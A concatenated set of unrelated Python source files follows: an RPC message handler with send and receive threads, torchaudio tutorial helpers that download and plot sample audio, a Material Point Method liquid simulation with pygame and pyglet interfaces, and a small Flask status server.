join_or_kill(self.process)
|
InvokerHandler.py
|
'''
Created on July 12, 2015
@author: sunshyran
'''
from rpc.framework.driver.MessageDriver import AbstractMessageDriver
from rpc.framework.driver.MessageThread import MessageFullError, StopError, \
MessageEmptyError, MessageThread
from rpc.framework.channel.ChannelError import ChannelBrokenError, \
ChannelClosedError, ChannelDataError
from rpc.framework.exception.HandlerError import HandlerBusyError, \
HandlerStopError
from rpc.framework.log.RPCLog import RPCLog
class InvokerHandler(AbstractMessageDriver):
'''
An RPC message handler with asynchronous support. It automatically sends messages out from this end and automatically receives RPC messages from the peer.
Internally it uses two threads, each with its own message queue, so that sending and receiving run in parallel.
'''
DEFAULT_TIMEOUT = None
def __init__(self, channel):
super().__init__()
self.channel = channel
self.invoking_thread = MessageThread(target=self.__dealing_invoker, name='invoking')
self.retrieving_thread = MessageThread(target=self.__receive_invoker, name='retrieving')
self.isrunning = False
def startup(self):
'''
@see MessageDriver.AbstractMessageDriver#startup
'''
print("MessageHandler startup")
self.isrunning = True
self.invoking_thread.start()
self.retrieving_thread.start()
def shutdown(self):
'''
@see MessageDriver.AbstractMessageDriver#shutdown
<p>The channel is closed before the send and receive queues are stopped.</p>
'''
print("MessageHandler shutdown")
# the underlying data channel must be closed first; only then can the sending and receiving threads be stopped
self.isrunning = False
self.channel.close()
self.invoking_thread.stopAndWait()
self.retrieving_thread.stopAndWait()
def invoke(self, invoker):
'''
invoke an RPC message
<p>This is an asynchronous model: the invoker is merely put into the invoker processing queue, so this call does not block.</p>
@return InvokeResult
'''
if not self.isrunning:
RPCLog.getLogger().error(self.__class__.__name__,'handler is not running yet')
raise HandlerStopError("try to invoke before handler run")
try:
self.invoking_thread.push(invoker, self.DEFAULT_TIMEOUT)
except MessageFullError:
RPCLog.getLogger().error(self.__class__.__name__, 'timeout when invoking %s' % invoker)
raise HandlerBusyError('invoke timeout')
except StopError:
RPCLog.getLogger().critical(self.__class__.__name__, 'fatal error when invoking %s' % invoker)
raise HandlerStopError('invoke failed')
def retrieve(self):
'''
Take one message from the retrieve queue.
@note: blocks until a message is available; returns None on timeout
@return: a message; if retrieval fails for some reason, an exception is raised
'''
if not self.isrunning:
RPCLog.getLogger().error(self.__class__.__name__,'handler is not running yet')
raise HandlerStopError("try to retrieve before handler run")
try:
message = self.retrieving_thread.pop(self.DEFAULT_TIMEOUT)
return message
except MessageEmptyError:
pass  # ignore
except StopError :
RPCLog.getLogger().critical(self.__class__.__name__,'fatal error when retrieve')
raise HandlerStopError('retrieve failed')
def __dealing_invoker(self):
while self.isrunning:
try:
# no timeout is used here; a timeout would only mean there is no pending request at the moment
invoker = self.invoking_thread.pop()
except StopError:
RPCLog.getLogger().exception(self.__class__.__name__,'stop invoking thread for exception')
break
try:
self.channel.send(invoker.message)
except (ChannelBrokenError, ChannelClosedError):
RPCLog.getLogger().exception(self.__class__.__name__, 'stop invoking thread for exception')
break
except ChannelDataError:
continue
def __receive_invoker(self):
while self.isrunning:
try :
message = self.channel.recv()
except (ChannelBrokenError, ChannelClosedError):
RPCLog.getLogger().exception(self.__class__.__name__, 'stop retrieving thread for exception')
break
except ChannelDataError:
continue
except Exception:
RPCLog.getLogger().exception(self.__class__.__name__, 'an exception happened when retrieving')
continue
if message is None: continue
try:
# the full-queue case is not handled here
self.retrieving_thread.push(message)
except MessageFullError as e:
RPCLog.getLogger().exception(self.__class__.__name__, '__receive_invoker: message(%s) is discarded due to %s' % (message, e))
except StopError:
RPCLog.getLogger().exception(self.__class__.__name__,'stop retrieving thread for exception')
break
self.retrieving_thread.push(None)  # FIXME: push an empty message so a blocked retrieve() call can wake up
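# Illustrative usage sketch (names such as SomeChannel are hypothetical; any channel
# object with send()/recv()/close() in the rpc.framework.channel sense should work):
#
#   handler = InvokerHandler(SomeChannel())
#   handler.startup()
#   handler.invoke(invoker)       # non-blocking: the invoker is queued for sending
#   message = handler.retrieve()  # blocks until a message arrives (None on timeout)
#   handler.shutdown()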
|
audioutil.py
|
#@title Prepare data and utility functions. {display-mode: "form"}
#@markdown
#@markdown You do not need to look into this cell.
#@markdown Just execute once and you are good to go.
#@markdown
#@markdown In this tutorial, we will use speech data from the [VOiCES dataset](https://iqtlabs.github.io/voices/), which is licensed under Creative Commons BY 4.0.
#-------------------------------------------------------------------------------
# Preparation of data and helper functions.
#-------------------------------------------------------------------------------
import io
import os
import math
import tarfile
import multiprocessing
import scipy
import librosa
import numpy as np
import torchaudio
import torchaudio.functional as F
import torchaudio.transforms as T
import torch
import boto3
from botocore import UNSIGNED
from botocore.config import Config
import requests
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import time
from IPython.display import Audio, display
[width, height] = matplotlib.rcParams['figure.figsize']
if width < 10:
matplotlib.rcParams['figure.figsize'] = [width * 2.5, height]
_SAMPLE_DIR = "_sample_data"
SAMPLE_WAV_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/steam-train-whistle-daniel_simon.wav"
SAMPLE_WAV_PATH = os.path.join(_SAMPLE_DIR, "steam.wav")
SAMPLE_WAV_SPEECH_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/VOiCES_devkit/source-16k/train/sp0307/Lab41-SRI-VOiCES-src-sp0307-ch127535-sg0042.wav"
SAMPLE_WAV_SPEECH_PATH = os.path.join(_SAMPLE_DIR, "speech.wav")
SAMPLE_RIR_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/VOiCES_devkit/distant-16k/room-response/rm1/impulse/Lab41-SRI-VOiCES-rm1-impulse-mc01-stu-clo.wav"
SAMPLE_RIR_PATH = os.path.join(_SAMPLE_DIR, "rir.wav")
SAMPLE_NOISE_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/VOiCES_devkit/distant-16k/distractors/rm1/babb/Lab41-SRI-VOiCES-rm1-babb-mc01-stu-clo.wav"
SAMPLE_NOISE_PATH = os.path.join(_SAMPLE_DIR, "bg.wav")
SAMPLE_MP3_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/steam-train-whistle-daniel_simon.mp3"
SAMPLE_MP3_PATH = os.path.join(_SAMPLE_DIR, "steam.mp3")
SAMPLE_GSM_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/steam-train-whistle-daniel_simon.gsm"
SAMPLE_GSM_PATH = os.path.join(_SAMPLE_DIR, "steam.gsm")
SAMPLE_TAR_URL = "https://pytorch-tutorial-assets.s3.amazonaws.com/VOiCES_devkit.tar.gz"
SAMPLE_TAR_PATH = os.path.join(_SAMPLE_DIR, "sample.tar.gz")
SAMPLE_TAR_ITEM = "VOiCES_devkit/source-16k/train/sp0307/Lab41-SRI-VOiCES-src-sp0307-ch127535-sg0042.wav"
S3_BUCKET = "pytorch-tutorial-assets"
S3_KEY = "VOiCES_devkit/source-16k/train/sp0307/Lab41-SRI-VOiCES-src-sp0307-ch127535-sg0042.wav"
YESNO_DATASET_PATH = os.path.join(_SAMPLE_DIR, "yes_no")
os.makedirs(YESNO_DATASET_PATH, exist_ok=True)
os.makedirs(_SAMPLE_DIR, exist_ok=True)
def _fetch_data():
uri = [
(SAMPLE_WAV_URL, SAMPLE_WAV_PATH),
(SAMPLE_WAV_SPEECH_URL, SAMPLE_WAV_SPEECH_PATH),
(SAMPLE_RIR_URL, SAMPLE_RIR_PATH),
(SAMPLE_NOISE_URL, SAMPLE_NOISE_PATH),
(SAMPLE_MP3_URL, SAMPLE_MP3_PATH),
(SAMPLE_GSM_URL, SAMPLE_GSM_PATH),
(SAMPLE_TAR_URL, SAMPLE_TAR_PATH),
]
for url, path in uri:
with open(path, 'wb') as file_:
file_.write(requests.get(url).content)
_fetch_data()
def _download_yesno():
if os.path.exists(os.path.join(YESNO_DATASET_PATH, "waves_yesno.tar.gz")):
return
torchaudio.datasets.YESNO(root=YESNO_DATASET_PATH, download=True)
YESNO_DOWNLOAD_PROCESS = multiprocessing.Process(target=_download_yesno)
YESNO_DOWNLOAD_PROCESS.start()
def _get_sample(path, resample=None):
effects = [
["remix", "1"]
]
if resample:
effects.extend([
["lowpass", f"{resample // 2}"],
["rate", f'{resample}'],
])
return torchaudio.sox_effects.apply_effects_file(path, effects=effects)
def get_speech_sample(*, resample=None):
return _get_sample(SAMPLE_WAV_SPEECH_PATH, resample=resample)
def get_sample(*, resample=None):
return _get_sample(SAMPLE_WAV_PATH, resample=resample)
def get_rir_sample(*, resample=None, processed=False):
rir_raw, sample_rate = _get_sample(SAMPLE_RIR_PATH, resample=resample)
if not processed:
return rir_raw, sample_rate
rir = rir_raw[:, int(sample_rate*1.01):int(sample_rate*1.3)]
rir = rir / torch.norm(rir, p=2)
rir = torch.flip(rir, [1])
return rir, sample_rate
def get_noise_sample(*, resample=None):
return _get_sample(SAMPLE_NOISE_PATH, resample=resample)
def print_stats(waveform, sample_rate=None, src=None):
if src:
print("-" * 10)
print("Source:", src)
print("-" * 10)
if sample_rate:
print("Sample Rate:", sample_rate)
print("Shape:", tuple(waveform.shape))
print("Dtype:", waveform.dtype)
print(f" - Max: {waveform.max().item():6.3f}")
print(f" - Min: {waveform.min().item():6.3f}")
print(f" - Mean: {waveform.mean().item():6.3f}")
print(f" - Std Dev: {waveform.std().item():6.3f}")
print()
print(waveform)
print()
def plot_waveform(waveform, sample_rate, title="Waveform", xlim=None, ylim=None):
waveform = waveform.numpy()
num_channels, num_frames = waveform.shape
time_axis = torch.arange(0, num_frames) / sample_rate
figure, axes = plt.subplots(num_channels, 1)
if num_channels == 1:
axes = [axes]
for c in range(num_channels):
axes[c].plot(time_axis, waveform[c], linewidth=1)
axes[c].grid(True)
if num_channels > 1:
axes[c].set_ylabel(f'Channel {c+1}')
if xlim:
axes[c].set_xlim(xlim)
if ylim:
axes[c].set_ylim(ylim)
figure.suptitle(title)
plt.show(block=False)
def plot_specgram(waveform, sample_rate, title="Spectrogram", xlim=None):
waveform = waveform.numpy()
num_channels, num_frames = waveform.shape
time_axis = torch.arange(0, num_frames) / sample_rate
figure, axes = plt.subplots(num_channels, 1)
if num_channels == 1:
axes = [axes]
for c in range(num_channels):
axes[c].specgram(waveform[c], Fs=sample_rate)
if num_channels > 1:
axes[c].set_ylabel(f'Channel {c+1}')
if xlim:
axes[c].set_xlim(xlim)
figure.suptitle(title)
plt.show(block=False)
def play_audio(waveform, sample_rate):
waveform = waveform.numpy()
num_channels, num_frames = waveform.shape
if num_channels == 1:
display(Audio(waveform[0], rate=sample_rate))
elif num_channels == 2:
display(Audio((waveform[0], waveform[1]), rate=sample_rate))
else:
raise ValueError("Waveform with more than 2 channels are not supported.")
def inspect_file(path):
print("-" * 10)
print("Source:", path)
print("-" * 10)
print(f" - File size: {os.path.getsize(path)} bytes")
print(f" - {torchaudio.info(path)}")
def plot_spectrogram(spec, title=None, ylabel='freq_bin', aspect='auto', xmax=None):
fig, axs = plt.subplots(1, 1)
axs.set_title(title or 'Spectrogram (db)')
axs.set_ylabel(ylabel)
axs.set_xlabel('frame')
im = axs.imshow(librosa.power_to_db(spec), origin='lower', aspect=aspect)
if xmax:
axs.set_xlim((0, xmax))
fig.colorbar(im, ax=axs)
plt.show(block=False)
def plot_mel_fbank(fbank, title=None):
fig, axs = plt.subplots(1, 1)
axs.set_title(title or 'Filter bank')
axs.imshow(fbank, aspect='auto')
axs.set_ylabel('frequency bin')
axs.set_xlabel('mel bin')
plt.show(block=False)
def envelope(y, rate, threshold):
# tracks the signal with a rolling maximum of the absolute amplitude; used to detect and strip dead (below-threshold) audio
mask = []
y = pd.Series(y).apply(np.abs)
y_mean = y.rolling(window=int(rate/20),
min_periods=1,
center=True).max()
for mean in y_mean:
if mean > threshold:
mask.append(True)
else:
mask.append(False)
return mask, y_mean
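# Example usage sketch (hypothetical names: y is a 1-D numpy signal, sr its sample rate):
#   mask, y_mean = envelope(y, sr, threshold=0.005)
#   y_clean = y[np.array(mask)]   # keep only samples whose rolling max exceeds the threshold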
def get_spectrogram(
n_fft = 400,
win_len = None,
hop_len = None,
power = 2.0,
):
waveform, _ = get_speech_sample()
spectrogram = T.Spectrogram(
n_fft=n_fft,
win_length=win_len,
hop_length=hop_len,
center=True,
pad_mode="reflect",
power=power,
)
return spectrogram(waveform)
def plot_pitch(waveform, sample_rate, pitch):
figure, axis = plt.subplots(1, 1)
axis.set_title("Pitch Feature")
axis.grid(True)
end_time = waveform.shape[1] / sample_rate
time_axis = torch.linspace(0, end_time, waveform.shape[1])
axis.plot(time_axis, waveform[0], linewidth=1, color='gray', alpha=0.3)
axis2 = axis.twinx()
time_axis = torch.linspace(0, end_time, pitch.shape[1])
ln2 = axis2.plot(
time_axis, pitch[0], linewidth=2, label='Pitch', color='green')
axis2.legend(loc=0)
plt.show(block=False)
def plot_kaldi_pitch(waveform, sample_rate, pitch, nfcc):
figure, axis = plt.subplots(1, 1)
axis.set_title("Kaldi Pitch Feature")
axis.grid(True)
end_time = waveform.shape[1] / sample_rate
time_axis = torch.linspace(0, end_time, waveform.shape[1])
axis.plot(time_axis, waveform[0], linewidth=1, color='gray', alpha=0.3)
time_axis = torch.linspace(0, end_time, pitch.shape[1])
ln1 = axis.plot(time_axis, pitch[0], linewidth=2, label='Pitch', color='green')
axis.set_ylim((-1.3, 1.3))
axis2 = axis.twinx()
time_axis = torch.linspace(0, end_time, nfcc.shape[1])
ln2 = axis2.plot(
time_axis, nfcc[0], linewidth=2, label='NFCC', color='blue', linestyle='--')
lns = ln1 + ln2
labels = [l.get_label() for l in lns]
axis.legend(lns, labels, loc=0)
plt.show(block=False)
DEFAULT_OFFSET = 201
SWEEP_MAX_SAMPLE_RATE = 48000
DEFAULT_LOWPASS_FILTER_WIDTH = 6
DEFAULT_ROLLOFF = 0.99
DEFAULT_RESAMPLING_METHOD = 'sinc_interpolation'
def _get_log_freq(sample_rate, max_sweep_rate, offset):
"""Get freqs evenly spaced out in log-scale, between [0, max_sweep_rate // 2]
offset is used to avoid negative infinity `log(offset + x)`.
"""
half = sample_rate // 2
start, stop = math.log(offset), math.log(offset + max_sweep_rate // 2)
return torch.exp(torch.linspace(start, stop, sample_rate, dtype=torch.double)) - offset
def _get_inverse_log_freq(freq, sample_rate, offset):
"""Find the time where the given frequency is given by _get_log_freq"""
half = sample_rate // 2
return sample_rate * (math.log(1 + freq / offset) / math.log(1 + half / offset))
def _get_freq_ticks(sample_rate, offset, f_max):
# Given the original sample rate used for generating the sweep,
# find the x-axis value where the log-scale major frequency values fall in
time, freq = [], []
for exp in range(2, 5):
for v in range(1, 10):
f = v * 10 ** exp
if f < sample_rate // 2:
t = _get_inverse_log_freq(f, sample_rate, offset) / sample_rate
time.append(t)
freq.append(f)
t_max = _get_inverse_log_freq(f_max, sample_rate, offset) / sample_rate
time.append(t_max)
freq.append(f_max)
return time, freq
def plot_sweep(waveform, sample_rate, title, max_sweep_rate=SWEEP_MAX_SAMPLE_RATE, offset=DEFAULT_OFFSET):
x_ticks = [100, 500, 1000, 5000, 10000, 20000, max_sweep_rate // 2]
y_ticks = [1000, 5000, 10000, 20000, sample_rate//2]
time, freq = _get_freq_ticks(max_sweep_rate, offset, sample_rate // 2)
freq_x = [f if f in x_ticks and f <= max_sweep_rate // 2 else None for f in freq]
freq_y = [f for f in freq if f >= 1000 and f in y_ticks and f <= sample_rate // 2]
figure, axis = plt.subplots(1, 1)
axis.specgram(waveform[0].numpy(), Fs=sample_rate)
plt.xticks(time, freq_x)
plt.yticks(freq_y, freq_y)
axis.set_xlabel('Original Signal Frequency (Hz, log scale)')
axis.set_ylabel('Waveform Frequency (Hz)')
axis.xaxis.grid(True, alpha=0.67)
axis.yaxis.grid(True, alpha=0.67)
figure.suptitle(f'{title} (sample rate: {sample_rate} Hz)')
plt.show(block=True)
def get_sine_sweep(sample_rate, offset=DEFAULT_OFFSET):
max_sweep_rate = sample_rate
freq = _get_log_freq(sample_rate, max_sweep_rate, offset)
delta = 2 * math.pi * freq / sample_rate
cumulative = torch.cumsum(delta, dim=0)
signal = torch.sin(cumulative).unsqueeze(dim=0)
return signal
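# get_sine_sweep builds a log-frequency chirp: _get_log_freq gives the instantaneous
# frequency per sample, the per-sample phase increments (2*pi*f/sample_rate) are
# integrated with torch.cumsum, and the sine of that phase sweeps from near 0 Hz up to
# sample_rate / 2.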
def benchmark_resample(
method,
waveform,
sample_rate,
resample_rate,
lowpass_filter_width=DEFAULT_LOWPASS_FILTER_WIDTH,
rolloff=DEFAULT_ROLLOFF,
resampling_method=DEFAULT_RESAMPLING_METHOD,
beta=None,
librosa_type=None,
iters=5
):
if method == "functional":
begin = time.time()
for _ in range(iters):
F.resample(waveform, sample_rate, resample_rate, lowpass_filter_width=lowpass_filter_width,
rolloff=rolloff, resampling_method=resampling_method)
elapsed = time.time() - begin
return elapsed / iters
elif method == "transforms":
resampler = T.Resample(sample_rate, resample_rate, lowpass_filter_width=lowpass_filter_width,
rolloff=rolloff, resampling_method=resampling_method, dtype=waveform.dtype)
begin = time.time()
for _ in range(iters):
resampler(waveform)
elapsed = time.time() - begin
return elapsed / iters
elif method == "librosa":
waveform_np = waveform.squeeze().numpy()
begin = time.time()
for _ in range(iters):
librosa.resample(waveform_np, sample_rate, resample_rate, res_type=librosa_type)
elapsed = time.time() - begin
return elapsed / iters
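# Example comparison sketch (hypothetical rates; uses the helpers defined above):
#   waveform, sample_rate = get_speech_sample(resample=48000)
#   t_func = benchmark_resample("functional", waveform, sample_rate, 16000)
#   t_tran = benchmark_resample("transforms", waveform, sample_rate, 16000)
#   t_libr = benchmark_resample("librosa", waveform, sample_rate, 16000, librosa_type="kaiser_best")
#   print(f"functional: {t_func:.4f}s  transforms: {t_tran:.4f}s  librosa: {t_libr:.4f}s")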
|
Liquid.py
|
"""
Liquid.py - Python+Pygame port V1 Robert Rasmay
MIT License ( http://www.opensource.org/licenses/mit-license.php )
/**
* self version:
* Copyright Stephen Sinclair (radarsat1) (http://www.music.mcgill.ca/~sinclair)
* MIT License ( http://www.opensource.org/licenses/mit-license.php )
* Downloaded from: http://www.music.mcgill.ca/~sinclair/blog
*/
/**
* Flash version:
* Copyright iunpin ( http://wonderfl.net/user/iunpin )
* MIT License ( http://www.opensource.org/licenses/mit-license.php )
* Downloaded from: http://wonderfl.net/c/6eu4
*/
/**
* Original Java version:
* http://grantkot.com/MPM/Liquid.html
*/
"""
import math
import random
from collections import namedtuple
RANGE = range(3)
RANGE2 = [(i, j) for i in RANGE for j in RANGE]
'''Some of these parameters are hard to explain in one or two sentences
(and a couple I made up) so I'll also link you to their corresponding
Wikipedia pages. One object I like to compare fluids with is springs.
Everybody is familiar with springs. If you pull on them they'll try to go
back to their original shape. Some springs are stronger and some are weaker
(stiffness and elasticity). Some springs will continue to bounce back and
forth for a long time, while others will quickly slow down and stop (bulk
viscosity and viscosity). If you pull hard enough the spring will break.
Density - Target density for the particles. Higher density makes particles
want to be closer together.
Stiffness - How compressible the fluid is.
Bulk viscosity - Kind of like damping. Another effect it will have is that
it'll smooth out shockwaves.
Elasticity - How fast the fluid will try to return to its original shape.
Viscosity - Kind of like bulk viscosity only this operates on the shear
components.
Yield rate - How fast the fluid forgets its shape or melts away. Only
affects things when elasticity is non-zero.
Gravity - How much the particles will accelerate downwards.
Smoothing - Smooths the velocity field. Will make things more stable. It is
also useful to have a high smoothing value when simulating elastic
materials.
'''
Material = namedtuple('Material', ['m', 'rd', 'k', 'v', 'd', 'g'])
class LiquidTest:
def __init__ (self, width, height, particles):
self.width = width
self.height = height
self.active = []
self.pressed = False
self.pressedprev = False
self.mouse = [0.0, 0.0]
self.mouse_prev = [0.0, 0.0]
self.grid = [[Node() for h in range(self.height)]
for w in range(self.width)]
water = Material(3, 1.0, 1.0, 1.0, 1.0, 1.0)
self.particles = [Particle(water, x + 4, y + 4, 0.0, 0.0)
for y in range(particles[1]) for x in range(particles[0])]
@staticmethod
def _equation1(x):
'''Return two lists of length 3.'''
pressure = [0.0, 0.0, 0.0]
gravity = [0.0, 0.0, 0.0]
pressure[0] = 0.5 * x * x + 1.5 * x + 1.125
gravity[0] = x + 1.5
x += 1.0
pressure[1] = -x * x + 0.75
gravity[1] = -2.0 * x
x += 1.0
pressure[2] = 0.5 * x * x - 1.5 * x + 1.125
gravity[2] = x - 1.5
return pressure, gravity
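# Note on _equation1 above: the returned "pressure" values appear to be the quadratic
# B-spline interpolation weights of a particle with respect to the three surrounding grid
# nodes, and the "gravity" values their derivatives; the names follow the original port
# rather than the underlying MPM math.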
def _step1(self):
for particle in self.particles:
particle.cx = int(particle.x - 0.5)
particle.cy = int(particle.y - 0.5)
particle.px, particle.gx = self._equation1(particle.cx - particle.x)
particle.py, particle.gy = self._equation1(particle.cy - particle.y)
for i, j in RANGE2:
n = self.grid[particle.cx + i][particle.cy + j]
if not n.active:
n.active = True
self.active.append(n)
phi = particle.px[i] * particle.py[j]
n.m += phi * particle.material.m
n.d += phi
n.gx += particle.gx[i] * particle.py[j]
n.gy += particle.px[i] * particle.gy[j]
def _density_summary(self, drag, mdx, mdy):
for p in self.particles:
cx = p.x
cy = p.y
cxi = cx + 1
cyi = cy + 1
n01 = self.grid[int(cx)][int(cy)]
n02 = self.grid[int(cx)][int(cyi)]
n11 = self.grid[int(cxi)][int(cy)]
n12 = self.grid[int(cxi)][int(cyi)]
pdx = n11.d - n01.d
pdy = n02.d - n01.d
C20 = 3.0 * pdx - n11.gx - 2.0 * n01.gx
C02 = 3.0 * pdy - n02.gy - 2.0 * n01.gy
C30 = -2.0 * pdx + n11.gx + n01.gx
C03 = -2.0 * pdy + n02.gy + n01.gy
csum1 = n01.d + n01.gy + C02 + C03
csum2 = n01.d + n01.gx + C20 + C30
C21 = 3.0 * n12.d - 2.0 * n02.gx - n12.gx - 3.0 * csum1 - C20
C31 = -2.0 * n12.d + n02.gx + n12.gx + 2.0 * csum1 - C30
C12 = 3.0 * n12.d - 2.0 * n11.gy - n12.gy - 3.0 * csum2 - C02
C13 = -2.0 * n12.d + n11.gy + n12.gy + 2.0 * csum2 - C03
C11 = n02.gx - C13 - C12 - n01.gx
u = p.x - cx
u2 = u * u
u3 = u * u2
v = p.y - cy
v2 = v * v
v3 = v * v2
density = (n01.d + n01.gx * u + n01.gy * v + C20 * u2 + C02 * v2 +
C30 * u3 + C03 * v3 + C21 * u2 * v + C31 * u3 * v + C12 * u *
v2 + C13 * u * v3 + C11 * u * v)
pressure = density - 1.0
if pressure > 2.0:
pressure = 2.0
fx = 0.0
fy = 0.0
if p.x < 4.0:
fx += p.material.m * (4.0 - p.x)
elif p.x > self.width:
fx += p.material.m * (self.width - p.x)
if p.y < 4.0:
fy += p.material.m * (4.0 - p.y)
elif p.y > self.height:
fy += p.material.m * (self.height - p.y)
if drag:
vx = math.fabs(p.x - self.mouse[0])
vy = math.fabs(p.y - self.mouse[1])
if vx < 10.0 > vy:
weight = (p.material.m * (1.0 - vx * 0.10) *
(1.0 - vy * 0.10))
fx += weight * (mdx - p.u)
fy += weight * (mdy - p.v)
for i, j in RANGE2:
n = self.grid[p.cx + i][p.cy + j]
phi = p.px[i] * p.py[j]
n.ax += -(p.gx[i] * p.py[j] * pressure) + fx * phi
n.ay += -(p.px[i] * p.gy[j] * pressure) + fy * phi
def _step3(self):
for p in self.particles:
for i, j in RANGE2:
n = self.grid[p.cx + i][p.cy + j]
phi = p.px[i] * p.py[j]
p.u += phi * n.ax
p.v += phi * n.ay
mu = p.material.m * p.u
mv = p.material.m * p.v
for i, j in RANGE2:
n = self.grid[p.cx + i][p.cy + j]
phi = p.px[i] * p.py[j]
n.u += phi * mu
n.v += phi * mv
def _step4(self):
for p in self.particles:
gu = 0.0
gv = 0.0
for i,j in RANGE2:
n = self.grid[p.cx + i][p.cy + j]
phi = p.px[i] * p.py[j]
gu += phi * n.u
gv += phi * n.v
p.x += gu
p.y += gv
p.u += 1.0 * (gu - p.u)
p.v += 1.0 * (gv - p.v)
if p.x < 1.0:
p.x = 1.0 + random.random() * 0.01
p.u = 0.0
elif p.x > self.width - 2:
p.x = self.width - 3 - random.random() * 0.01
p.u = 0.0
if p.y < 1.0:
p.y = 1.0 + random.random() * 0.01
p.v = 0.0
elif p.y > self.height - 2:
p.y = self.height - 3 - random.random() * 0.01
p.v = 0.0
def simulate(self):
drag = False
mdx = mdy = 0.0
if self.pressed and self.pressedprev:
drag = True
mdx = self.mouse[0] - self.mouse_prev[0]
mdy = self.mouse[1] - self.mouse_prev[1]
self.pressedprev = self.pressed
self.mouse_prev[0] = self.mouse[0]
self.mouse_prev[1] = self.mouse[1]
for node in self.active:
node.__init__()
self.active = []
self._step1()
self._density_summary(drag, mdx, mdy)
for n in self.active:
if n.m > 0.0:
n.ax /= n.m
n.ay /= n.m
n.ay += 0.03
self._step3()
for n in self.active:
if n.m > 0.0:
n.u /= n.m
n.v /= n.m
self._step4()
class Node:
def __init__(self):
self.m = 0
self.d = 0
self.gx = 0
self.gy = 0
self.u = 0
self.v = 0
self.ax = 0
self.ay = 0
self.active = False
class Particle:
'''Particles are value holders that manage the mathematical and physical
attributes of an object'''
def __init__(self, material, x, y, u, v):
self.cx = 0
self.cy = 0
self.px = [0.0, 0.0, 0.0]
self.py = [0.0, 0.0, 0.0]
self.gx = [0.0, 0.0, 0.0]
self.gy = [0.0, 0.0, 0.0]
self.material = material
self.x = x
self.y = y
self.u = u
self.v = v
try:
self.color = pygame.Color(0, 0, 255, 255)
except NameError:
self.color = (0, 0, 255)
def pygame_main(liquid):
'''The main loop for the pygame interface. The pygame window will be 4
times wider and 4 times taller than the width and height of the liquid
simulation. It uses a standard double buffered sdl window. With pygame the
simulation speed and the framerate are locked together. You can use the
mouse to click and drag around the particles.'''
import pygame
import pygame.locals
pygame.init()
canvas = pygame.display.set_mode(
(liquid.width*4, liquid.height*4), pygame.DOUBLEBUF)
while True:
# clear
canvas.fill(0, (3, 3, liquid.width*4-4, liquid.height*4-4))
# draw simulation state
for p in liquid.particles:
pygame.draw.line(
canvas,
p.color,
(4*p.x, 4*p.y,),
(4*(p.x - p.u), 4*(p.y - p.v))
)
pygame.display.flip()
#get events
for event in pygame.event.get():
if event.type == pygame.locals.QUIT:
return
elif event.type == pygame.locals.MOUSEBUTTONDOWN:
liquid.pressed = True
elif event.type == pygame.locals.MOUSEBUTTONUP:
liquid.pressed = False
elif event.type == pygame.locals.MOUSEMOTION:
liquid.mouse[0] = event.pos[0]/4
liquid.mouse[1] = event.pos[1]/4
# advance simulation
liquid.simulate()
def pyglet_main(liquid):
'''Creates a pyglet window and context that will be 4 times wider and 4
times taller than the simulation area. Pyglet uses asynchronous event
handlers so there are a few functions here to handle those events and
update the simulation variables. The framerate is not tied to the
simulation speed because the simulation runs in its own thread and
pyglet is scheduled to redraw at 30 Hz.'''
from pyglet.window import mouse
from pyglet import gl, clock, app, graphics
import pyglet.window
import threading
window = pyglet.window.Window(
width = liquid.width * 4, height = liquid.height * 4
)
@window.event
def on_draw():
'''The draw command is one glDraw command after gathering all of the
vertex information from the simulation. The draw loop first draws the
lines in simulation coordinates which is then "scaled" up using
glMatrixMode/glOrtho.'''
window.clear()
vertices = []
colors = []
for p in liquid.particles:
vertices.extend([p.x, p.y, p.x - p.u, p.y - p.v])
colors.extend(p.color)
colors.extend([0, 0, 0])
graphics.draw(
len(liquid.particles)*2,
gl.GL_LINES,
('v2f', vertices),
('c3B', colors)
)
gl.glMatrixMode(gl.GL_PROJECTION)
gl.glLoadIdentity()
gl.glOrtho(0, liquid.width, liquid.height, 0, -1, 1)
gl.glMatrixMode(gl.GL_MODELVIEW)
@window.event
def on_mouse_press(x, y, button, modifiers):
'''Takes mouse press coordinates and sends them to the liquid
simulation object.'''
if button == mouse.LEFT:
liquid.mouse[0] = x/4
liquid.mouse[1] = liquid.height - y/4
liquid.pressed = True
@window.event
def on_mouse_release(x, y, button, modifiers):
'''Tells the liquid simulation to stop tracking the mouse.'''
liquid.pressed = False
@window.event
def on_mouse_drag(x, y, dx, dy, button, modifiers):
'''Updates the liquid simulation mouse coordinates.'''
if button == mouse.LEFT:
liquid.mouse[0] = x/4
liquid.mouse[1] = liquid.height - y/4
stop = threading.Event()
def loop(lt, stop):
'''This is an endless but stoppable loop to run the simulation in a
thread while pyglet handles the drawing and mouse events.'''
while True:
lt.simulate()
if stop.is_set():
break
def induce_paint(dt):
'''This is a dummy function that is added to the pyglet schedule so
that the screen can be updated in a timely fashion independent of the
simulation.'''
pass
worker = threading.Thread(target=loop, args=(liquid, stop))
clock.schedule_interval(induce_paint, 1.0/30.0)
worker.start()
app.run()
stop.set()
worker.join()
if __name__ == "__main__":
import argparse
PARSER = argparse.ArgumentParser(
prog='Liquid.py',
description='Material Point Method liquid simulation',
)
PARSER.add_argument('--width', type=int,
help='The width of the simulation area', default=100)
PARSER.add_argument('--height', type=int,
help='The height of the simulation area', default=100)
PARSER.add_argument('--columns', type=int,
help='The number of particle columns', default=50)
PARSER.add_argument('--rows', type=int,
help='The number of particle rows', default=80)
PARSER.add_argument('--n', type=int,
help='The number of iterations to run the simulation.',
default=200)
PARSER.add_argument('-i', '--interactive',
help='Run the simulation interactively with pygame or pyglet',
choices=['pygame', 'pyglet'])
ARGS = PARSER.parse_args()
LIQUID_TEST = LiquidTest(ARGS.width, ARGS.height, (ARGS.columns, ARGS.rows))
if ARGS.interactive == 'pygame':
pygame_main(LIQUID_TEST)
elif ARGS.interactive == 'pyglet':
pyglet_main(LIQUID_TEST)
else:
import timeit
TIMER = timeit.Timer('LIQUID_TEST.simulate()',
setup='from __main__ import LIQUID_TEST')
TOTAL = TIMER.timeit(ARGS.n)
print "Total simulation time: {0}".format(TOTAL)
print "Average simulation frame time: {0}".format(TOTAL/ARGS.n)
|
web_server.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Server is up!"
def run():
app.run(host='0.0.0.0',port=8080)
